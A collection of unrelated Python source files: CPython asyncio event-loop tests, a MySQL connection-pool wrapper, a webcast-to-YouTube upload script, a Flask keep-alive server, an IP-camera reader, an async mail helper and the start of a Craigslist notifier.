host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@socket_helper.skip_unless_bind_unix_socket
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
@unittest.skipIf(sys.platform == 'vxworks',
"SO_BROADCAST is enabled by default on VxWorks")
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
async def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(os_helper.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
os_helper.unlink(os_helper.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(os_helper.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, socket_helper.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(os_helper.TESTFN, encoding="utf-8") as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
dbpond3.py
|
#!/usr/bin/python3
#-*-coding:utf-8-*-
import os
import sys
import traceback
import logging
import threading
import configparser
import time
import pymysql
from DBUtils.PooledDB import PooledDB
basedir = os.path.dirname(os.path.realpath(__file__))
locking = threading.Lock()
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s>{%(levelname)s}:%(message)s')
'''One database connection object per thread'''
# the @ symbol marks a decorator
class Database(object):
__dp = None
def __init__(self):
#logging.info('DatabaseIniting...')
Database.__dp = DBPond()
    '''Query for a list of rows'''
def fetchall(self, query, args=None):
result = None
with Database.__dp as db:
try:
db.cursor.execute(query, args)
result = db.cursor.fetchall()
except Exception as e:
self.exception('fetchall')
return result
    '''Query for a single record'''
def fetchone(self, query, args=None):
result = None
with Database.__dp as db:
try:
db.cursor.execute(query, args)
result = db.cursor.fetchone()
except Exception as e:
self.exception('fetchone')
return result
    '''Insert a record and return its primary key ID'''
def insert(self, query, args=None):
result = None
with Database.__dp as db:
cs = db.cursor
try:
cs.execute(query, args)
db.conn.commit()
except Exception as e:
db.conn.rollback()
self.exception('insert')
result = cs.lastrowid
return result
    '''Standard execute (returns the affected row count)'''
def execute(self, query, args=None):
result = None
with Database.__dp as db:
cs = db.cursor
try:
cs.execute(query, args)
db.conn.commit()
except Exception as e:
db.conn.rollback()
self.exception('execute')
result = cs.rowcount
return result
    '''Record exceptions to the database'''
def exception(self, remark):
#a,b,c = sys.exc_info()
logging.info(traceback.format_exc(limit=1))
content = traceback.format_exc()
message = str(sys.exc_info())
seetime = time.strftime('%F %T')
sql = "INSERT INTO `smnt_except` (`service`, `message`, `content`, `remark`, `seetime`) VALUES ('sqlexcept', %s, %s, %s, %s);"
with Database.__dp as db:
cs = db.cursor
#logging.debug(cs.mogrify(sql, (message, content, remark, seetime)))
try:
cs.execute(sql, args=(message, content, remark, seetime))
db.conn.commit()
except:
pass
return None
'''Database connection pool that can be shared across threads'''
class DBPond():
__pool = None
def __init__(self):
locking.acquire()
if DBPond.__pool is None:
cfgdir = '{basedir}{sep}conf{sep}config.ini'.format(basedir=basedir, sep=os.sep)
dbsdir = '{basedir}{sep}conf{sep}database.ini'.format(basedir=basedir, sep=os.sep)
cp = configparser.ConfigParser()
cp.read(cfgdir, encoding='utf-8')
plate = cp.get('general', 'plate')
cp.read(dbsdir, encoding='utf-8')
link = cp.items(plate)
            #[1] mincached: minimum number of idle connections kept in the pool; new ones are created when fewer are idle
            #[5] maxcached: maximum number of idle connections; surplus idle connections are closed
            #[3] maxshared: maximum number of shared connections; once reached, new requests share existing connections
            #[5] maxconnections: maximum total number of connections
            #[5] maxusage: maximum number of times a single connection is reused
DBPond.__pool = PooledDB(pymysql,
host=link[0][1],
port=int(link[4][1]),
user=link[1][1],
passwd=link[2][1],
db=link[3][1],
mincached=1,
maxcached=5,
maxshared=3,
maxconnections=5,
blocking=True,
maxusage=5,
setsession=None,
use_unicode=False,
charset='utf8')
#logging.debug('********************CREATE:%d'%id(DBPond.__pool))
else:
#logging.debug('====USE:%d'%id(DBPond.__pool))
pass
locking.release()
def __enter__(self):
self.conn = DBPond.__pool.connection()
self.cursor = self.conn.cursor()
return self
def __exit__(self, type, value, trace):
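        # Note: close() on a PooledDB connection does not tear down the real
        # socket; it returns the connection to the shared pool for reuse.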
#logging.debug('__exit__:%d'%id(self.__pool))
self.cursor.close()
self.conn.close()
#return self
db = Database()
def testdb():
#db = Database()
version = db.fetchone('SELECT VERSION();')
#logging.info(version)
excepts = db.fetchall('SELECT COUNT(*) FROM `smnt_except`;')
#logging.info(excepts)
import hashlib
for i in range(10):
officeid, realname, passbase = ['guangzhou', '张三', str(time.time())]
username = ''
password = hashlib.md5(passbase.encode('utf8')).hexdigest()
sql = "INSERT INTO `smnt_client` (`officeid`, `username`, `realname`, `password`, `passbase`) VALUES (%s, %s, %s, %s, %s)"
userid = db.insert(sql, (officeid, username, realname, password, passbase))
userkey = '%s%d'%(password[:16], userid)
result = db.execute("UPDATE `smnt_client` SET `userkey`=%s WHERE `id`=%s;", (userkey, userid))
        #if result == 1:
        #    logging.info("Insert succeeded:%s"%userkey)
        #else:
        #    logging.info("Insert failed:%s"%result)
version = db.execute("SELECT VERSION();")
#logging.info(version)
if __name__ == '__main__':
starttime = time.time()
tl = []
logging.info("testdb...")
for i in range(50):
i = threading.Thread(target=testdb)
tl.append(i)
i.start()
for i in tl:
i.join()
logging.info("COST:%.3f"%(time.time()-starttime))
|
2016Webcast3.py
|
#!/usr/bin/env python
import sys, os, time, urllib, urllib.request, shutil, re, lxml, threading, queue, multiprocessing
import hashlib, csv, subprocess
def get_sha256(text):
sha256 = hashlib.sha256()
sha256.update(text.encode('utf-8'))
return sha256.hexdigest()
def check_list(list, url):
# check if sha256 of url matches a sha256 in the list
# returns true if there's a match, false otherwise
if list is None:
return False
for row in list:
list_sha256 = row[0]
if list_sha256 == get_sha256(url):
return True
return False
def youtube_upload(worker_num, lock, task_queue, file, log):
# Worker thread function that will process each task in the queue
# and will block if there are no items in the queue
# Each task will download from a url and then upload to Youtube.
# Thread will not get next task until its task is done
while True:
task = task_queue.get() # task = (title, url)
if task is None:
print("%d: youtube_upload worker done" % (worker_num), flush=True)
break;
else:
print("%d: working on %s" % (worker_num, task[0]), flush=True)
# download video
title = task[0]
url = task[1]
vid_title = title + '.mp4'
try:
urllib.request.urlretrieve(url, vid_title)
except Exception as e:
print("youtube_upload error: unable to download", title, url, flush=True)
task_queue.task_done()
continue
# delete file if too small
size = os.path.getsize(vid_title)
if size <= 1000000: # delete < 1 MB file
os.remove(vid_title)
print("%d: removed (too small) %s" % (worker_num, vid_title), flush=True)
task_queue.task_done()
continue
# upload to youtube
tag_title = '--title={0:s}'.format(title)
tag_privacy = "--privacy=unlisted"
playlist = "2016_webcasts"
tag_playlist = "--playlist=" + playlist
youtube_upload = r"C:\users\jj\appdata\local\programs\python\Python35-32\Scripts\youtube-upload"
retry_count = 0
for attempt in range(20): # max 20 retry
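                # Note: subprocess.run() only raises TimeoutExpired when a
                # timeout= argument is supplied; as written the call blocks
                # until youtube-upload exits, so the retry branch below acts
                # only as a safety net.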
try:
subprocess.run(['python', youtube_upload,
tag_title, tag_privacy, tag_playlist,
vid_title],
stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except subprocess.TimeoutExpired as e:
print("%d: timeout (%d) while working on %s" %
(worker_num, attempt, vid_title), flush=True)
retry_count += 1
continue
else:
break
# delete video from local storage
if os.path.exists(vid_title):
os.remove(vid_title)
# return to start and get a new video
if retry_count >= 20:
print("%d: retry attempt MAXED out while working on %s" %
(worker_num, vid_title))
log.write("never uploaded: " + vid_title + '\n')
log.flush()
continue
# record video information
lock.acquire()
sha256 = get_sha256(url)
video_info = "{0:s}, {1:s}, {2:s}\n".format(sha256, title, url)
file.write(video_info)
file.flush()
lock.release()
print("%d: uploaded %s" % (worker_num, vid_title))
task_queue.task_done()
def main(argv):
# MATH 3 LEC fall 2016 class- 30 [version 1],http://matterhorn2-player-1.lt.ucsc.edu:8080/static/engage-player/547a1471-4c04-491b-9448-6ab3a1079aea/6b7f3ad3-37b3-47ce-912b-c7585cae6cfd/screen_primary.mp4
read_file = open('2016webcastslinks4.txt', 'r')
log_file = open('log.txt', 'w')
done_list = None
if os.path.exists('2016storage.txt'):
complete_file = open('2016storage.txt', 'r')
done_reader = csv.reader(complete_file, delimiter=',')
done_list = []
for row in done_reader:
done_list.append(row)
complete_file.close()
complete_file = open('2016storage.txt', 'a')
# start a few threads
lock = threading.Lock()
task_queue = queue.Queue()
workers = []
num_worker = 5
for i in range(num_worker):
worker = threading.Thread(target=youtube_upload, args=(i, lock, task_queue, complete_file, log_file))
worker.start()
workers.append(worker)
# read in list of videos
invalid_links = []
reader = csv.reader(read_file, delimiter=',')
for row in reader: # row = [title, url]
title = row[0]
url = row[1]
        # throw away the row if the url doesn't contain http or isn't in .mp4 format, i.e. an invalid link
        if 'http' not in url or not url.endswith('mp4'):
invalid_links.append((title, url))
continue
if check_list(done_list, url) is False:
task_queue.put((title, url))
else:
print("%s already uploaded" % title)
continue
task_queue.join()
for i in range(num_worker):
task_queue.put(None)
for worker in workers:
worker.join()
print("\nList of invalid links:")
for i in range(len(invalid_links)):
print(invalid_links[i][0], end=' ' )
print(invalid_links[i][1])
print("\nscript done.")
read_file.close()
complete_file.close()
log_file.close()
if __name__ == "__main__":
main(sys.argv[1:])
|
webserver.py
|
# -- Importing Packages -- #
from flask import Flask
from threading import Thread
from logging import getLogger, ERROR
# -- Disables Flask App Logging -- #
log = getLogger('werkzeug')
log.setLevel(ERROR)
# -- Webserver Setup -- #
app = Flask('')
@app.route('/')
def home():
return "<h1> Hosting Active </h1><p>This bot is made by RLX and MathisCool, So make sure to credit RLX/MathisCool</p><p>Join the discord server now - https://discord.gg/SN3mZPxjEW</p>"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
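
# Minimal usage sketch (assumes this module is importable as `webserver` and
# that a discord.py bot object and TOKEN exist elsewhere in the project):
#
#   from webserver import keep_alive
#   keep_alive()   # start the Flask thread so the hosting platform sees traffic
#   bot.run(TOKEN)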
|
rovio_video.py
|
import cv2, time
import urllib.request as urllib
import base64
import numpy as np
import threading
class ipCamera(object):
def __init__(self, url, user = None, password = None, debug=False):
self.url = url
        # base64.encodestring() was removed in Python 3.9; b64encode() adds no trailing newline, and decoding keeps the header value a str
        self.auth_encoded = base64.b64encode(('%s:%s' % (user, password)).encode()).decode('ascii')
self.debug = debug
self.curr_frame = None
self.thread = threading.Thread(target=self.stream_frame)
        self.thread.daemon = True
self.thread.start()
def stream_frame(self):
request = urllib.Request(self.url)
request.add_header('Authorization', 'Basic %s' % self.auth_encoded)
while True:
try:
response = urllib.urlopen(request)
img_array = np.asarray(bytearray(response.read()), dtype=np.uint8)
frame = cv2.imdecode(img_array, 1)
self.curr_frame = frame
if self.debug:
cv2.imshow('Raw frame',self.curr_frame)
cv2.waitKey(1)
except Exception as e:
                print('ipCamera stream error:', e)
    def get_frame(self, img_width=640, img_height=480):
        # Copy the latest frame so callers never see it mutated mid-read; if no
        # frame has arrived yet, return None rather than resizing a null image.
        frame = self.curr_frame.copy() if self.curr_frame is not None else None
        if frame is None:
            return None
        frame = cv2.resize(frame, (img_width, img_height))
        return frame
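
# Minimal usage sketch (the URL and credentials below are placeholders, not
# values taken from the original code):
#
#   cam = ipCamera('http://192.168.1.10/Jpeg/CamImg.jpg', user='admin', password='admin')
#   while True:
#       frame = cam.get_frame()
#       if frame is not None:
#           cv2.imshow('rovio', frame)
#       if cv2.waitKey(30) & 0xFF == ord('q'):
#           break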
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Sends asynchronous mails with threading
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MUDAWEN_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MUDAWEN_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
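
# Usage sketch (hypothetical caller; assumes a `user` object with an `email`
# attribute, a `token` variable, and `templates/email/confirm.txt`/`.html`):
#
#   send_email(user.email, 'Confirm Your Account', 'email/confirm',
#              user=user, token=token)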
|
cl.py
|
import feedparser
from datetime import datetime
import time
import socket
from threading import Thread
import json
import os
from cl_email import CL_Email
from cl_post import CL_Post
from log import Logging
def CheckNotityInterval(notification_intervals):
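    # Returns True (and clears that interval's flag) for the first notification
    # interval whose scheduled time has passed; main() uses this to decide
    # whether an email digest should be sent on this run.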
for notify_time, notify_sent_flag in notification_intervals.items():
if notify_sent_flag:
if UnixTime(notify_time) <= int(time.time()):
notification_intervals[notify_time] = not notify_sent_flag
return True
